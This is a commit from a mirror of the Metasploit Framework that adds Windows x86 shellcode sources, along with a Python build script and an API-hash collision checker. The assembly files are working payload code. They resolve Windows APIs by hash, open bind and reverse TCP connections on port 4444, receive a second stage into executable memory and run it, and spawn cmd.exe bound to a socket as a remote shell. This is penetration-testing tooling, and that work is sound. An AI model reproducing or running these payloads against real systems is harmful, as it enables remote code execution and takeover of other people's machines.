mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-29 18:07:27 +01:00
Overhaul of the metasploit payloads from Stephen Fewer - smaller/cleaner/new hashing/support for WinNT 4.0 -> Win7 with size reductions for the stagers and minimal size increases for the singles
git-svn-id: file:///home/svn/framework3/trunk@6922 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
91faadd782
commit
49b7dcb30c
BIN
external/source/shellcode/windows/x86/bin/single_exec.bin
vendored
Normal file
BIN
external/source/shellcode/windows/x86/bin/single_exec.bin
vendored
Normal file
Binary file not shown.
BIN
external/source/shellcode/windows/x86/bin/single_shell_bind_tcp.bin
vendored
Normal file
BIN
external/source/shellcode/windows/x86/bin/single_shell_bind_tcp.bin
vendored
Normal file
Binary file not shown.
BIN
external/source/shellcode/windows/x86/bin/single_shell_reverse_tcp.bin
vendored
Normal file
BIN
external/source/shellcode/windows/x86/bin/single_shell_reverse_tcp.bin
vendored
Normal file
Binary file not shown.
BIN
external/source/shellcode/windows/x86/bin/stage_shell.bin
vendored
Normal file
BIN
external/source/shellcode/windows/x86/bin/stage_shell.bin
vendored
Normal file
Binary file not shown.
BIN
external/source/shellcode/windows/x86/bin/stage_upexec.bin
vendored
Normal file
BIN
external/source/shellcode/windows/x86/bin/stage_upexec.bin
vendored
Normal file
Binary file not shown.
BIN
external/source/shellcode/windows/x86/bin/stager_bind_tcp_nx.bin
vendored
Normal file
BIN
external/source/shellcode/windows/x86/bin/stager_bind_tcp_nx.bin
vendored
Normal file
Binary file not shown.
BIN
external/source/shellcode/windows/x86/bin/stager_reverse_tcp_nx.bin
vendored
Normal file
BIN
external/source/shellcode/windows/x86/bin/stager_reverse_tcp_nx.bin
vendored
Normal file
Binary file not shown.
98
external/source/shellcode/windows/x86/build.py
vendored
Normal file
98
external/source/shellcode/windows/x86/build.py
vendored
Normal file
@ -0,0 +1,98 @@
|
||||
#=============================================================================#
|
||||
# A simple python build script to build the singles/stages/stagers and
|
||||
# some usefull information such as offsets and a hex dump. The binary output
|
||||
# will be placed in the bin directory. A hex string and usefull comments will
|
||||
# be printed to screen.
|
||||
#
|
||||
# Example:
|
||||
# >python build.py stager_reverse_tcp_nx
|
||||
#
|
||||
# Example, to build everything:
|
||||
# >python build.py all > build_output.txt
|
||||
#
|
||||
# Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
#=============================================================================#
|
||||
import os, sys, time
|
||||
from subprocess import Popen
|
||||
from struct import pack
|
||||
#=============================================================================#
|
||||
def clean( dir="./bin/" ):
|
||||
for root, dirs, files in os.walk( dir ):
|
||||
for name in files:
|
||||
os.remove( os.path.join( root, name ) )
|
||||
#=============================================================================#
|
||||
def locate( src_file, dir="./src/" ):
|
||||
for root, dirs, files in os.walk( dir ):
|
||||
for name in files:
|
||||
if src_file == name:
|
||||
return root
|
||||
return None
|
||||
#=============================================================================#
|
||||
def build( name ):
|
||||
location = locate( "%s.asm" % name )
|
||||
if location:
|
||||
input = os.path.normpath( os.path.join( location, name ) )
|
||||
output = os.path.normpath( os.path.join( "./bin/", name ) )
|
||||
p = Popen( ["nasm", "-f bin", "-O3", "-o %s.bin" % output, "%s.asm" % input ] )
|
||||
p.wait()
|
||||
xmit( name )
|
||||
else:
|
||||
print "[-] Unable to locate '%s.asm' in the src directory" % name
|
||||
#=============================================================================#
|
||||
def xmit_dump_ruby( data, length=16 ):
|
||||
dump = ""
|
||||
for i in xrange( 0, len( data ), length ):
|
||||
bytes = data[ i : i+length ]
|
||||
hex = "\"%s\"" % ( ''.join( [ "\\x%02X" % ord(x) for x in bytes ] ) )
|
||||
if i+length <= len(data):
|
||||
hex += " +"
|
||||
dump += "%s\n" % ( hex )
|
||||
print dump
|
||||
#=============================================================================#
|
||||
def xmit_offset( data, name, value ):
|
||||
offset = data.find( value );
|
||||
if offset != -1:
|
||||
print "# %s Offset: %d" % ( name, offset )
|
||||
#=============================================================================#
|
||||
def xmit( name, dump_ruby=True ):
|
||||
bin = os.path.normpath( os.path.join( "./bin/", "%s.bin" % name ) )
|
||||
f = open( bin, 'rb')
|
||||
data = f.read()
|
||||
print "# Name: %s\n# Length: %d bytes" % ( name, len( data ) )
|
||||
xmit_offset( data, "Port", pack( ">H", 4444 ) ) # 4444
|
||||
xmit_offset( data, "Host", pack( ">L", 0x7F000001 ) ) # 127.0.0.1
|
||||
xmit_offset( data, "ExitFunk", pack( "<L", 0x0A2A1DE0 ) ) # kernel32.dll!ExitThread
|
||||
xmit_offset( data, "ExitFunk", pack( "<L", 0x56A2B5F0 ) ) # kernel32.dll!ExitProcess
|
||||
xmit_offset( data, "ExitFunk", pack( "<L", 0xEA320EFE ) ) # kernel32.dll!SetUnhandledExceptionFilter
|
||||
xmit_offset( data, "ExitFunk", pack( "<L", 0xE035F044 ) ) # kernel32.dll!Sleep
|
||||
if dump_ruby:
|
||||
xmit_dump_ruby( data )
|
||||
#=============================================================================#
|
||||
def main( argv=None ):
|
||||
if not argv:
|
||||
argv = sys.argv
|
||||
try:
|
||||
if len( argv ) == 1:
|
||||
print "Usage: build.py [clean|all|<name>]"
|
||||
else:
|
||||
print "# Built on %s\n" % ( time.asctime( time.localtime() ) )
|
||||
if argv[1] == "clean":
|
||||
clean()
|
||||
elif argv[1] == "all":
|
||||
for root, dirs, files in os.walk( "./src/single/" ):
|
||||
for name in files:
|
||||
build( name[:-4] )
|
||||
for root, dirs, files in os.walk( "./src/stage/" ):
|
||||
for name in files:
|
||||
build( name[:-4] )
|
||||
for root, dirs, files in os.walk( "./src/stager/" ):
|
||||
for name in files:
|
||||
build( name[:-4] )
|
||||
else:
|
||||
build( argv[1] )
|
||||
except Exception, e:
|
||||
print "[-] ", e
|
||||
#=============================================================================#
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
#=============================================================================#
|
97
external/source/shellcode/windows/x86/src/block/block_api.asm
vendored
Normal file
97
external/source/shellcode/windows/x86/src/block/block_api.asm
vendored
Normal file
@ -0,0 +1,97 @@
|
||||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (24 July 2009)
|
||||
; Size: 137 bytes
|
||||
;-----------------------------------------------------------------------------;
|
||||
|
||||
[BITS 32]
|
||||
|
||||
; Input: The hash of the API to call and all its parameters must be pushed onto stack.
|
||||
; Output: The return value from the API call will be in EAX.
|
||||
; Clobbers: EAX, ECX and EDX (ala the normal stdcall calling convention)
|
||||
; Un-Clobbered: EBX, ESI, EDI, ESP and EBP can be expected to remain un-clobbered.
|
||||
; Note: This function assumes the direction flag has allready been cleared via a CLD instruction.
|
||||
; Note: This function is unable to call forwarded exports.
|
||||
|
||||
api_call:
|
||||
pushad ; We preserve all the registers for the caller, bar EAX and ECX.
|
||||
mov ebp, esp ; Create a new stack frame
|
||||
xor edx, edx ; Zero EDX
|
||||
mov edx, [fs:edx+48] ; Get a pointer to the PEB
|
||||
mov edx, [edx+12] ; Get PEB->Ldr
|
||||
mov edx, [edx+20] ; Get the first module from the InMemoryOrder module list
|
||||
next_mod: ;
|
||||
mov esi, [edx+40] ; Get pointer to modules name (unicode string)
|
||||
movzx ecx, word [edx+38] ; Set ECX to the length we want to check
|
||||
xor edi, edi ; Clear EDI which will store the hash of the module name
|
||||
loop_modname: ;
|
||||
xor eax, eax ; Clear EAX
|
||||
lodsb ; Read in the next byte of the name
|
||||
cmp al, 'a' ; Some versions of Windows use lower case module names
|
||||
jl not_lowercase ;
|
||||
sub al, 0x20 ; If so normalise to uppercase
|
||||
not_lowercase: ;
|
||||
ror edi, 13 ; Rotate right our hash value
|
||||
add edi, eax ; Add the next byte of the name
|
||||
loop loop_modname ; Loop untill we have read enough
|
||||
; We now have the module hash computed
|
||||
push edx ; Save the current position in the module list for later
|
||||
push edi ; Save the current module hash for later
|
||||
; Proceed to itterate the export address table,
|
||||
mov edx, [edx+16] ; Get this modules base address
|
||||
mov eax, [edx+60] ; Get PE header
|
||||
add eax, edx ; Add the modules base address
|
||||
mov eax, [eax+120] ; Get export tables RVA
|
||||
test eax, eax ; Test if no export address table is present
|
||||
jz get_next_mod1 ; If no EAT present, process the next module
|
||||
add eax, edx ; Add the modules base address
|
||||
push eax ; Save the current modules EAT
|
||||
mov ecx, [eax+24] ; Get the number of function names
|
||||
mov ebx, [eax+32] ; Get the rva of the function names
|
||||
add ebx, edx ; Add the modules base address
|
||||
; Computing the module hash + function hash
|
||||
get_next_func: ;
|
||||
jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
|
||||
dec ecx ; Decrement the function name counter
|
||||
mov esi, [ebx+ecx*4] ; Get rva of next module name
|
||||
add esi, edx ; Add the modules base address
|
||||
xor edi, edi ; Clear EDI which will store the hash of the function name
|
||||
; And compare it to the one we want
|
||||
loop_funcname: ;
|
||||
xor eax, eax ; Clear EAX
|
||||
lodsb ; Read in the next byte of the ASCII function name
|
||||
ror edi, 13 ; Rotate right our hash value
|
||||
add edi, eax ; Add the next byte of the name
|
||||
cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
|
||||
jne loop_funcname ; If we have not reached the null terminator, continue
|
||||
add edi, [ebp-8] ; Add the current module hash to the function hash
|
||||
cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for
|
||||
jnz get_next_func ; Go compute the next function hash if we have not found it
|
||||
; If found, fix up stack, call the function and then value else compute the next one...
|
||||
pop eax ; Restore the current modules EAT
|
||||
mov ebx, [eax+36] ; Get the ordinal table rva
|
||||
add ebx, edx ; Add the modules base address
|
||||
mov cx, [ebx+2*ecx] ; Get the desired functions ordinal
|
||||
mov ebx, [eax+28] ; Get the function addresses table rva
|
||||
add ebx, edx ; Add the modules base address
|
||||
mov eax, [ebx+4*ecx] ; Get the desired functions RVA
|
||||
add eax, edx ; Add the modules base address to get the functions actual VA
|
||||
; We now fix up the stack and perform the call to the desired function...
|
||||
finish:
|
||||
mov [esp+36], eax ; Overwrite the old EAX value with the desired api address for the upcoming popad
|
||||
pop ebx ; Clear off the current modules hash
|
||||
pop ebx ; Clear off the current position in the module list
|
||||
popad ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
|
||||
pop ecx ; Pop off the origional return address our caller will have pushed
|
||||
pop edx ; Pop off the hash value our caller will have pushed
|
||||
push ecx ; Push back the correct return value
|
||||
jmp eax ; Jump into the required function
|
||||
; We now automagically return to the correct caller...
|
||||
get_next_mod: ;
|
||||
pop eax ; Pop off the current (now the previous) modules EAT
|
||||
get_next_mod1: ;
|
||||
pop edi ; Pop off the current (now the previous) modules hash
|
||||
pop edx ; Restore our position in the module list
|
||||
mov edx, [edx] ; Get the next module
|
||||
jmp short next_mod ; Process this module
|
63
external/source/shellcode/windows/x86/src/block/block_bind_tcp.asm
vendored
Normal file
63
external/source/shellcode/windows/x86/src/block/block_bind_tcp.asm
vendored
Normal file
@ -0,0 +1,63 @@
|
||||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer@harmonysecurity.com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (24 July 2009)
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
|
||||
; Input: EBP must be the address of 'api_call'.
|
||||
; Output: EDI will be the newly connected clients socket
|
||||
; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
|
||||
|
||||
bind_tcp:
|
||||
push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack.
|
||||
push 0x5F327377 ; ...
|
||||
push esp ; Push a pointer to the "ws2_32" string on the stack.
|
||||
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
|
||||
call ebp ; LoadLibraryA( "ws2_32" )
|
||||
|
||||
mov eax, 0x0190 ; EAX = sizeof( struct WSAData )
|
||||
sub esp, eax ; alloc some space for the WSAData structure
|
||||
push esp ; push a pointer to this stuct
|
||||
push eax ; push the wVersionRequested parameter
|
||||
push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" )
|
||||
call ebp ; WSAStartup( 0x0190, &WSAData );
|
||||
|
||||
push eax ; if we succeed, eax wil be zero, push zero for the flags param.
|
||||
push eax ; push null for reserved parameter
|
||||
push eax ; we do not specify a WSAPROTOCOL_INFO structure
|
||||
push eax ; we do not specify a protocol
|
||||
inc eax ;
|
||||
push eax ; push SOCK_STREAM
|
||||
inc eax ;
|
||||
push eax ; push AF_INET
|
||||
push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
|
||||
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
|
||||
mov edi, eax ; save the socket for later
|
||||
|
||||
xor ebx, ebx ; Clear EBX
|
||||
push ebx ; bind to 0.0.0.0
|
||||
push 0x5C110002 ; family AF_INET and port 4444
|
||||
mov esi, esp ; save a pointer to sockaddr_in struct
|
||||
push byte 16 ; length of the sockaddr_in struct (we only set the first 8 bytes as the last 8 are unused)
|
||||
push esi ; pointer to the sockaddr_in struct
|
||||
push edi ; socket
|
||||
push 0x6737DBC2 ; hash( "ws2_32.dll", "bind" )
|
||||
call ebp ; bind( s, &sockaddr_in, 16 );
|
||||
|
||||
push ebx ; backlog
|
||||
push edi ; socket
|
||||
push 0xFF38E9B7 ; hash( "ws2_32.dll", "listen" )
|
||||
call ebp ; listen( s, 0 );
|
||||
|
||||
push ebx ; we set length for the sockaddr struct to zero
|
||||
push ebx ; we dont set the optional sockaddr param
|
||||
push edi ; listening socket
|
||||
push 0xE13BEC74 ; hash( "ws2_32.dll", "accept" )
|
||||
call ebp ; accept( s, 0, 0 );
|
||||
|
||||
push edi ; push the listening socket to close
|
||||
mov edi, eax ; swap the new connected socket over the listening socket
|
||||
push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" )
|
||||
call ebp ; closesocket( s );
|
||||
|
52
external/source/shellcode/windows/x86/src/block/block_exitfunk.asm
vendored
Normal file
52
external/source/shellcode/windows/x86/src/block/block_exitfunk.asm
vendored
Normal file
@ -0,0 +1,52 @@
|
||||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (24 July 2009)
|
||||
; Size: 31 bytes
|
||||
;-----------------------------------------------------------------------------;
|
||||
; kernel32.dll!SetUnhandledExceptionFilter (0xEA320EFE) - This exit function
|
||||
; will let the UnhandledExceptionFilter function perform its default handling
|
||||
; routine.
|
||||
;
|
||||
; kernel32.dll!ExitProcess (0x56A2B5F0) - This exit function will force the
|
||||
; process to terminate.
|
||||
;
|
||||
; kernel32.dll!ExitThread (0x0A2A1DE0) - This exit function will force the
|
||||
; current thread to terminate. On Windows 2008, Vista and 7 this function is
|
||||
; a forwarded export to ntdll.dll!RtlExitUserThread and as such cannot be
|
||||
; called by the api_call function.
|
||||
;
|
||||
; ntdll.dll!RtlExitUserThread (0x6F721347) - This exit function will force
|
||||
; the current thread to terminate. This function is not available on Windows
|
||||
; NT or 2000.
|
||||
;-----------------------------------------------------------------------------;
|
||||
; Windows 7 6.1
|
||||
; Windows Server 2008 R2 6.1 If the EXITFUNK is ExitThread we must call
|
||||
; Windows Server 2008 6.0 RtlExitUserThread instead.
|
||||
; Windows Vista 6.0 _______________________________________________
|
||||
; Windows Server 2003 R2 5.2
|
||||
; Windows Server 2003 5.2
|
||||
; Windows XP 5.1
|
||||
; Windows 2000 5.0
|
||||
; Windows NT4 4.0
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
|
||||
; Input: EBP must be the address of 'api_call'.
|
||||
; Output: None.
|
||||
; Clobbers: EAX, EBX, (ESP will also be modified)
|
||||
; Note: Execution is not expected to (successfully) continue past this block
|
||||
|
||||
exitfunk:
|
||||
mov ebx, 0x0A2A1DE0 ; The EXITFUNK as specified by user...
|
||||
push 0x9DBD95A6 ; hash( "kernel32.dll", "GetVersion" )
|
||||
call ebp ; GetVersion(); (AL will = major version and AH will = minor version)
|
||||
cmp al, byte 6 ; If we are not running on Windows Vista, 2008 or 7
|
||||
jl short goodbye ; Then just call the exit function...
|
||||
cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
|
||||
jne short goodbye ;
|
||||
mov ebx, 0x6F721347 ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
|
||||
goodbye: ; We now perform the actual call to the exit function
|
||||
push byte 0 ; push the exit function parameter
|
||||
push ebx ; push the hash of the exit function
|
||||
call ebp ; call EXITFUNK( 0 );
|
44
external/source/shellcode/windows/x86/src/block/block_recv.asm
vendored
Normal file
44
external/source/shellcode/windows/x86/src/block/block_recv.asm
vendored
Normal file
@ -0,0 +1,44 @@
|
||||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (24 July 2009)
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
|
||||
; Compatible: block_bind_tcp, block_reverse_tcp
|
||||
|
||||
; Input: EBP must be the address of 'api_call'. EDI must be the socket. ESI is a pointer on stack.
|
||||
; Output: None.
|
||||
; Clobbers: EAX, EBX, ESI, (ESP will also be modified)
|
||||
|
||||
recv:
|
||||
; Receive the size of the incoming second stage...
|
||||
push byte 0 ; flags
|
||||
push byte 4 ; length = sizeof( DWORD );
|
||||
push esi ; the 4 byte buffer on the stack to hold the second stage length
|
||||
push edi ; the saved socket
|
||||
push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
|
||||
call ebp ; recv( s, &dwLength, 4, 0 );
|
||||
; Alloc a RWX buffer for the second stage
|
||||
mov esi, [esi] ; dereference the pointer to the second stage length
|
||||
push byte 0x40 ; PAGE_EXECUTE_READWRITE
|
||||
push 0x1000 ; MEM_COMMIT
|
||||
push esi ; push the newly recieved second stage length.
|
||||
push byte 0 ; NULL as we dont care where the allocation is.
|
||||
push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
|
||||
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
|
||||
; Receive the second stage and execute it...
|
||||
mov ebx, eax ; ebx = our new memory address for the new stage
|
||||
push ebx ; push the address of the new stage so we can return into it
|
||||
read_more: ;
|
||||
push byte 0 ; flags
|
||||
push esi ; length
|
||||
push ebx ; the current address into our second stages RWX buffer
|
||||
push edi ; the saved socket
|
||||
push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
|
||||
call ebp ; recv( s, buffer, length, 0 );
|
||||
add ebx, eax ; buffer += bytes_received
|
||||
sub esi, eax ; length -= bytes_received
|
||||
test esi, esi ; test length
|
||||
jnz read_more ; continue if we have more to read
|
||||
ret ; return into the second stage
|
45
external/source/shellcode/windows/x86/src/block/block_reverse_tcp.asm
vendored
Normal file
45
external/source/shellcode/windows/x86/src/block/block_reverse_tcp.asm
vendored
Normal file
@ -0,0 +1,45 @@
|
||||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (24 July 2009)
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
|
||||
; Input: EBP must be the address of 'api_call'.
|
||||
; Output: EDI will be the socket for the connection to the server
|
||||
; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
|
||||
|
||||
reverse_tcp:
|
||||
push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack.
|
||||
push 0x5F327377 ; ...
|
||||
push esp ; Push a pointer to the "ws2_32" string on the stack.
|
||||
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
|
||||
call ebp ; LoadLibraryA( "ws2_32" )
|
||||
|
||||
mov eax, 0x0190 ; EAX = sizeof( struct WSAData )
|
||||
sub esp, eax ; alloc some space for the WSAData structure
|
||||
push esp ; push a pointer to this stuct
|
||||
push eax ; push the wVersionRequested parameter
|
||||
push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" )
|
||||
call ebp ; WSAStartup( 0x0190, &WSAData );
|
||||
|
||||
push eax ; if we succeed, eax wil be zero, push zero for the flags param.
|
||||
push eax ; push null for reserved parameter
|
||||
push eax ; we do not specify a WSAPROTOCOL_INFO structure
|
||||
push eax ; we do not specify a protocol
|
||||
inc eax ;
|
||||
push eax ; push SOCK_STREAM
|
||||
inc eax ;
|
||||
push eax ; push AF_INET
|
||||
push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
|
||||
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
|
||||
mov edi, eax ; save the socket for later
|
||||
|
||||
push 0x0100007F ; host 127.0.0.1
|
||||
push 0x5C110002 ; family AF_INET and port 4444
|
||||
mov esi, esp ; save pointer to sockaddr struct
|
||||
push byte 16 ; length of the sockaddr struct
|
||||
push esi ; pointer to the sockaddr struct
|
||||
push edi ; the socket
|
||||
push 0x6174A599 ; hash( "ws2_32.dll", "connect" )
|
||||
call ebp ; connect( s, &sockaddr, 16 );
|
49
external/source/shellcode/windows/x86/src/block/block_shell.asm
vendored
Normal file
49
external/source/shellcode/windows/x86/src/block/block_shell.asm
vendored
Normal file
@ -0,0 +1,49 @@
|
||||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (24 July 2009)
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
|
||||
; Input: EBP must be the address of 'api_call'. EDI must be a socket.
|
||||
; Output: None.
|
||||
; Clobbers: EAX, EBX, ECX, ESI, ESP will also be modified
|
||||
|
||||
shell:
|
||||
push 0x00646D63 ; push our command line: 'cmd',0
|
||||
mov ebx, esp ; save a pointer to the command line
|
||||
push edi ; our socket becomes the shells hStdError
|
||||
push edi ; our socket becomes the shells hStdOutput
|
||||
push edi ; our socket becomes the shells hStdInput
|
||||
xor esi, esi ; Clear ESI for all the NULL's we need to push
|
||||
push byte 18 ; We want to place (18 * 4) = 72 null bytes onto the stack
|
||||
pop ecx ; Set ECX for the loop
|
||||
push_loop: ;
|
||||
push esi ; push a null dword
|
||||
loop push_loop ; keep looping untill we have pushed enough nulls
|
||||
mov word [esp + 60], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
|
||||
lea eax, [esp + 16] ; Set EAX as a pointer to our STARTUPINFO Structure
|
||||
mov byte [eax], 68 ; Set the size of the STARTUPINFO Structure
|
||||
; perform the call to CreateProcessA
|
||||
push esp ; Push the pointer to the PROCESS_INFORMATION Structure
|
||||
push eax ; Push the pointer to the STARTUPINFO Structure
|
||||
push esi ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent
|
||||
push esi ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent
|
||||
push esi ; We dont specify any dwCreationFlags
|
||||
inc esi ; Increment ESI to be one
|
||||
push esi ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent
|
||||
dec esi ; Decrement ESI back down to zero
|
||||
push esi ; Set lpThreadAttributes to NULL
|
||||
push esi ; Set lpProcessAttributes to NULL
|
||||
push ebx ; Set the lpCommandLine to point to "cmd",0
|
||||
push esi ; Set lpApplicationName to NULL as we are using the command line param instead
|
||||
push 0x863FCC79 ; hash( "kernel32.dll", "CreateProcessA" )
|
||||
call ebp ; CreateProcessA( 0, &"cmd", 0, 0, TRUE, 0, 0, 0, &si, &pi );
|
||||
; perform the call to WaitForSingleObject
|
||||
mov eax, esp ; save pointer to the PROCESS_INFORMATION Structure
|
||||
dec esi ; Decrement ESI down to -1 (INFINITE)
|
||||
push esi ; push INFINITE inorder to wait forever
|
||||
inc esi ; Increment ESI back to zero
|
||||
push dword [eax] ; push the handle from our PROCESS_INFORMATION.hProcess
|
||||
push 0x601D8708 ; hash( "kernel32.dll", "WaitForSingleObject" )
|
||||
call ebp ; WaitForSingleObject( pi.hProcess, INFINITE );
|
146
external/source/shellcode/windows/x86/src/hash.py
vendored
Normal file
146
external/source/shellcode/windows/x86/src/hash.py
vendored
Normal file
@ -0,0 +1,146 @@
|
||||
#=============================================================================#
|
||||
# This script can detect hash collisions between exported API functions in
|
||||
# multiple modules by either scanning a directory tree or just a single module.
|
||||
# This script can also just output the correct hash value for any single API
|
||||
# function for use with the 'api_call' function in 'block_api.asm'.
|
||||
#
|
||||
# Example: Detect fatal collisions against all modules in the C drive:
|
||||
# >hash.py /dir c:\
|
||||
#
|
||||
# Example: List the hashes for all exports from kernel32.dll (As found in 'c:\windows\system32\')
|
||||
# >hash.py /mod c:\windows\system32\ kernel32.dll
|
||||
#
|
||||
# Example: Simply print the correct hash value for the function kernel32.dll!WinExec
|
||||
# >hash.py kernel32.dll WinExec
|
||||
#
|
||||
# Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
#=============================================================================#
|
||||
from sys import path
|
||||
import os, time, sys
|
||||
|
||||
# Modify this path to pefile to suit your machine...
|
||||
pefile_path = "D:\\Development\\Frameworks\\pefile\\"
|
||||
|
||||
path.append( pefile_path )
|
||||
import pefile
|
||||
#=============================================================================#
|
||||
collisions = [ ( 0x006B8029, "ws2_32.dll!WSAStartup" ),
|
||||
( 0xE0DF0FEA, "ws2_32.dll!WSASocketA" ),
|
||||
( 0x6737DBC2, "ws2_32.dll!bind" ),
|
||||
( 0xFF38E9B7, "ws2_32.dll!listen" ),
|
||||
( 0xE13BEC74, "ws2_32.dll!accept" ),
|
||||
( 0x614D6E75, "ws2_32.dll!closesocket" ),
|
||||
( 0x6174A599, "ws2_32.dll!connect" ),
|
||||
( 0x5FC8D902, "ws2_32.dll!recv" ),
|
||||
( 0x5F38EBC2, "ws2_32.dll!send" ),
|
||||
|
||||
( 0x5BAE572D, "kernel32.dll!WriteFile" ),
|
||||
( 0x4FDAF6DA, "kernel32.dll!CreateFileA" ),
|
||||
( 0x13DD2ED7, "kernel32.dll!DeleteFileA" ),
|
||||
( 0xE449F330, "kernel32.dll!GetTempPathA" ),
|
||||
( 0x528796C6, "kernel32.dll!CloseHandle" ),
|
||||
( 0x863FCC79, "kernel32.dll!CreateProcessA" ),
|
||||
( 0xE553A458, "kernel32.dll!VirtualAlloc" ),
|
||||
( 0x300F2F0B, "kernel32.dll!VirtualFree" ),
|
||||
( 0x0726774C, "kernel32.dll!LoadLibraryA" ),
|
||||
( 0x7802F749, "kernel32.dll!GetProcAddress" ),
|
||||
( 0x601D8708, "kernel32.dll!WaitForSingleObject" ),
|
||||
( 0x876F8B31, "kernel32.dll!WinExec" ),
|
||||
( 0x9DBD95A6, "kernel32.dll!GetVersion" ),
|
||||
( 0xEA320EFE, "kernel32.dll!SetUnhandledExceptionFilter" ),
|
||||
( 0x56A2B5F0, "kernel32.dll!ExitProcess" ),
|
||||
( 0x0A2A1DE0, "kernel32.dll!ExitThread" ),
|
||||
|
||||
( 0x6F721347, "ntdll.dll!RtlExitUserThread" ),
|
||||
|
||||
( 0x23E38427, "advapi32.dll!RevertToSelf" )
|
||||
]
|
||||
|
||||
collisions_detected = {}
|
||||
modules_scanned = 0
|
||||
functions_scanned = 0
|
||||
#=============================================================================#
|
||||
def ror( dword, bits ):
|
||||
return ( dword >> bits | dword << ( 32 - bits ) ) & 0xFFFFFFFF
|
||||
#=============================================================================#
|
||||
def unicode( string, uppercase=True ):
|
||||
result = "";
|
||||
if uppercase:
|
||||
string = string.upper()
|
||||
for c in string:
|
||||
result += c + "\x00"
|
||||
return result
|
||||
#=============================================================================#
|
||||
def hash( module, function, bits=13, print_hash=True ):
|
||||
module_hash = 0
|
||||
function_hash = 0
|
||||
for c in unicode( module + "\x00" ):
|
||||
module_hash = ror( module_hash, bits )
|
||||
module_hash += ord( c )
|
||||
for c in str( function + "\x00" ):
|
||||
function_hash = ror( function_hash, bits )
|
||||
function_hash += ord( c )
|
||||
h = module_hash + function_hash & 0xFFFFFFFF
|
||||
if print_hash:
|
||||
print "[+] 0x%08X = %s!%s" % ( h, module.lower(), function )
|
||||
return h
|
||||
#=============================================================================#
|
||||
def scan( dll_path, dll_name, print_hashes=False, print_collisions=True ):
|
||||
global modules_scanned
|
||||
global functions_scanned
|
||||
try:
|
||||
dll_name = dll_name.lower()
|
||||
modules_scanned += 1
|
||||
pe = pefile.PE( os.path.join( dll_path, dll_name ) )
|
||||
for export in pe.DIRECTORY_ENTRY_EXPORT.symbols:
|
||||
if export.name is None:
|
||||
continue
|
||||
h = hash( dll_name, export.name, print_hash=print_hashes )
|
||||
for ( col_hash, col_name ) in collisions:
|
||||
if col_hash == h and col_name != "%s!%s" % (dll_name, export.name):
|
||||
if h not in collisions_detected.keys():
|
||||
collisions_detected[h] = []
|
||||
collisions_detected[h].append( (dll_path, dll_name, export.name) )
|
||||
break
|
||||
functions_scanned += 1
|
||||
except:
|
||||
pass
|
||||
#=============================================================================#
|
||||
def scan_directory( dir ):
|
||||
for dot, dirs, files in os.walk( dir ):
|
||||
for file_name in files:
|
||||
if file_name[-4:] == ".dll":# or file_name[-4:] == ".exe":
|
||||
scan( dot, file_name )
|
||||
print "\n[+] Found %d Collisions.\n" % ( len(collisions_detected) )
|
||||
